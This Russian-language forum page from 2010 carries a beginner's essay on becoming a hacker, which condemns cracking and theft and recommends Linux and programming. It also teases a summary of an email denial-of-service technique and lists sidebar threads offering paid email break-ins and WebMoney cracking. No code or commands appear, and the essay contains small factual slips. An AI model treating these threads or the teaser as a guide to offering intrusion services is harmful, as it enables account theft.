    Что же нужно для того чтобы стать хакером? Да и вообще кто такой хакер? Чем он занимается? Всё это – основные вопросы новичков, которые хотят попробовать себя в хакерском деле. Честно скажу, я сам являюсь этим новичком. Но я этого не стыжусь! Пусть остальные «крутые» хакеры кричат «Ты ламер поганый! Я тебя одним пальцем раздавлю! Почитай детские книжки!» Ну и ЧТО! Да я ПОКА ламер,, да я ЧИТАЮ книги для новичков, да я ХОЧУ стать хакером. Пусть меня пока недооценивают, но нужно, закусив губу двигаться вперед. Пусть пока что черепашьим шагом, но главное – вперед. Это моя логика новичка. Я не заставляю вас следовать ей, я просто излагаю свои мысли. Но если вы все-таки хотите стать хакером, то вы должны знать - кто же это такой. Не нужно стремиться к тому, чего не знаешь или не понимаешь. Давайте вместе разберемся… КТО ТАКОЙ ХАКЕР Есть множество мнений о значение слова «хакер». Но я хочу выделить лишь два ОСНОВНЫХ значений этого слова. Начнем с самого распространенного среди журналистов, политиков, полицейских, многих начинающих юзеров, которые только-только подключивших интернет и даже более продвинутых пользователей, многих родителей и родственников, школьников и студентов, в общем, обыкновенных непосвященных людей. Они считают, что хакер – взломщик, преступник, человек мешающий обществу, тупое, необразованное животное, работающее ради собственной наживы. Именно такого мнения придерживаются все эти слои населения. Но для начала давайте заглянем в прошлое. Ведь сначала не было никакого Internet’a. Первой сетью был ASPAnet, которую разработали люди особой субкультуры. Их называли хакерами. Под этим термином подразумевали людей, которые великолепно разбирались в компьютерах. Их считали гениями. Их боготворили, пытались им подражать. Так было до изобретения Internet’a, в котором участвовали сами хакеры. Но через некоторое время после изобретения великой сети, среди этого сообщества появились индивидуумы, которые были недовольны стезей обычного хакера-программиста. Эти люди стали взламывать программы, изменять их, делать себя их автором, воровать хлеб у создателей этих программ. И тогда хакеры отделили взломщиков от своего сообщества и стали называть их крекерами (ломаками, босяками). Но крекеры были недовольны своей участью и стали именовать себя хакерами, которыми не являлись. Это и перепутало мнение об истинных хакерах. Люди стали сомневаться и наконец, стали называть хакерами всех, кто имел отношение к взлому. Хакером, стало быть, не престижно. Действительно, что хорошего быть потенциальным преступником, которым и является крекер. Но все забыли об истинном отличие хакера от крекера. Хакер это деятель, изобретатель, созерцатель. Он создает новые программы и утилиты и не имеет никакого отношения к взлому. Крекер же это обычно человек, не имеющий, каких либо обширных познаний в компьютерах. Крекеры ломают программы, крадут деньги из интернет-магазинов, взламывают сайты, пишут вирусы. Для этого естественно требуются знания, но какие. Самые минимальные и грубые. Конечно, некоторые вирусы написаны великолепным программистом, но этот вирус несет разрушение – и это главное отличие. Если вы создали пусть даже самую маленькую новую программу, то это делает вас хакером, но если же вы написали вирус, который уничтожает данные, то это подчерк крекера. Так что выбирайте свой путь. ХАКЕР или КРЕКЕР. Если вы выбрали второй, то смело закрывайте эту статью и готовьтесь отмотать свой срок на Нарах, когда обнаружите, что вы не слишком умелый преступник. Именно преступник, ведь допустим кража паролей или WM, это все равно, что кража бумажников у прохожих. Если же вы хотите стать ХАКЕРОМ, то приготовьтесь к трудностям и читайте дальше. ЧТО НУЖНО ЧТОБЫ СТАТЬ ХАКЕРОМ Да путь хакера очень тяжел и тернист. Сначала вы, скорее всего, пойдете по дороге, протоптанной многими уже опытными и состоявшимися хакерами. Но потом вам следует выбрать свой путь, прокладывать собственную дорогу. И кто знает, может вы станете великим программистом и великолепным хакером. Но что для этого нужно? Я думаю, надо выполнить четыре основных шага. Шаг 1. Для начала подумайте, нужно ли вам это. Чтобы стать хакером нужно много и упорно трудиться. Хорошо бы обладать чувством юмора. Смех продлевает жизнь – это факт. Приведу даже пример. Моя прабабушка прожила 93 года. И, вы не поверите, смотрела мультики «Том и Джерри», передачи Задорнова, Comedy Club, Наша Раша и остальной репертуар ТНТ и русского юмора. Она рассказывала такие смешные истории, что смеяться было можно часами. Она всегда жила с юмором, все делала шутя. Даже когда заболела и уже не могла говорить, писала небольшие, но смешные сказки. Но никто не живет вечно, но она прожила яркую и веселую жизнь и ушла из этого грешного мира с высоко поднятой головой и с улыбкой на лице. Вы должны понимать кто такой хакер. Без этого знания вам никогда им не стать. Советую почитать книги М. Левина. Этот автор очень хорошо дает определение хакера. Также почитайте другие статьи на ХЗ. Когда вы все-таки разберетесь во всем этом, то вы можете начинать свой путь. Шаг 2. Я прочитал очень много статей о Linux. Раньше я вообще не знал, что существуют, какие-то другие системы кроме Windows. Я спокойно работал с виндой и был рад, что на нее идут много понравившихся мне игр. Кроме них я ничем не интересовался. Но мой компьютер постепенно начал захламляться и в итоге все привело к тому, что Рабочий стол заразился каким-то вирусом и игры перестали работать. Я чуть ли не плача стер любимую Windows XP SP2 и установил SP3. Но у меня пропал звук в колонках из-за отсутствия драйверов. Сейчас я в глубоком замешательстве, но ко мне попала ОС Linux, и я намерен ее установить. Из многих статей я узнал, что эта система отличается от винды тем, что в ней присутствуют открытые коды и саму систему можно изменить по собственному велению и хотению. Я пришел к выводу, что с ней работать намного полезнее и интереснее. Ведь можно изменить систему, так как тебе удобнее. Советую вам попробовать установить эту ОС и попробовать с ней поработать. Шаг 3. Вы должны научиться программировать. Это обязательно! Нужно знать не один язык, а несколько. Многие советуют начать с Delphi, Python – потому что это самые легкие языки. Потом советуют изучать Perl, C#, Lisp, Visual Basic. И уже после Assembler. Сам я только начал изучать Делфи и могу сказать, что это совсем не трудно, хотя нужно трудиться, ведь без труда не вытащишь код из софта. Лучше всего знать несколько языков, это очень полезно, ведь в каждом из них есть свои особенности и фишки. Шаг 4. Ты должен строго придерживаться своих взглядов и идеалов. Никогда не изменяй своим мечтам, не сдавайся, иди вперед. Преодолевай преграды и трудности. И самое главное не используй свои знания во зло обществу. Не становись банальным крекером. Создавай программы с открытым кодом, делись своими знаниями и опытом с другими хакерами. И тогда ты получишь признание и уважение у других виртуозов компьютерного искусства. Конечно, хакеры тоже люди и им нужны деньги чтобы кушать, иметь крышу над головой и содержать свою семью. Они имеют право продавать свои программы, работать на компании и заниматься исследованиями. Но все-таки не нужно работать только ради денег, иначе это может повредить вашему мастерству. Вы не должны ни от кого зависеть. Не позволяйте вами командовать. Творите, совершенствуйтесь, набирайтесь опыта и тогда станете уважаемым и знаменитым хакером. С уважением X-FACTOR
  • Скрины:
  • Дата: 04.02.2010
  • Добавил: profi
  • Комментарии: (0)
    • Атака на отказ через ... e-mail
    Кратко смысл данной статьи можно выразить так: существующие службы (анонимных) почтовых пересылок ( часто называемых римейлингом или форвардингом) за счет совместных недоработок открывают путь для тупейшей атаки на отказ произвольного почтового ящика/сервера с небольшими ресурсами и ... самих себя! Хуже всего то, что методика, описанная ниже, по силам и "чайнику"( правда, последнего потом, еще можно найти). Кстати и сам автор специализируется совсем в другой области.
    ... Читать дальше »
  • Скрины:
  • Дата: 23.01.2010
  • Добавил: 911
  • Комментарии: (0)

    		•
    Аккаунт

    Облако тегов
    Ссылки

     
    Наша кнопка


    Статистика
    Рассылка
    Наш сайт живет 6816-й день.                                                                                         Статистика Форума
    Последние обновленные темы Самые популярные темы Самые активные Новые участники
  • Не могу зайти Вконтакт.Надеюсь на помощь. (18)
  • Реверсинг троянов, вирей, и прочего malware, бесплатно, по п (12)
  • Прием заказов на почту. (8)
  • Когда можно считать себя хакером? (6)
  • html (6)
  • Strange file (5)
  • Виды (типы) угроз и атак в сети Internet (10)
  • Пишем Sms флудер и спамер (0)
    		•
  • Немного юмора (180)
  • Total Influence online (115)
  • Задаем вопросы, получаем ответы =) (46)
  • Взлом (38)
  • Как ломать ВебМани? (31)
  • Флуд флуд флуд) (30)
  • Прием заказов на взлом почт (26)
  • Пеленгатор - правда или вымысел ? (24)
    		•
  • Админ
  • pomogu
  • www
  • admin
  • Inaccessible
  • BiOhAzaRD
  • us
  • Tamriel
  • Texnar
  • xak
  • ==01==
  • фраер
  • Diamond_JockeR
  • Сохатый
  • ava
  • Bazalt
    		•
  • serviceman
  • interception
  • piqasso
  • OriuS
  • Varley
  • pupil
  • NoGGaNo
  • otpusk06
  • SMileshkin
  • Mao636
  • antoha
  • rinat
  • jecka
  • unicornum
  • rubitb
  • Aero894